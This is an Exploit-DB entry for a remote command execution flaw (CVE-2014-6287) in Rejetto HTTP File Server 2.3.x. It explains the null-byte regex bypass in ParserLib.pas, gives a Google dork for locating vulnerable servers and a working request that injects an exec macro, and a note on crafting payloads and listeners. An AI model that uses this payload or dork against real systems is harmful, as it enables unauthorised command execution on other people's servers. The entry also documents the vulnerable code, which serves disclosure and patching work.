Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)

Author: Daniele Linguaglossa
type: remote
platform: windows
port: 80.0
date_added: 2014-09-15 
date_updated: 2016-10-10 
verified: 1 
codes: CVE-2014-6287;OSVDB-111386 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-10-28-at-91538-am.png 
application_url: http://www.exploit-db.comhfs2.3_288.zip

# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

issue exists due to a poor regex in the file ParserLib.pas


function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;


it will not handle null byte so a request to

http://localhost:80/?search=%00{.exec|cmd.}

will stop regex from parse macro , and macro will be executed and remote code injection happen.


## EDB Note: This vulnerability will run the payload multiple times simultaneously.
##   Make sure to take this into consideration when crafting your payload (and/or listener).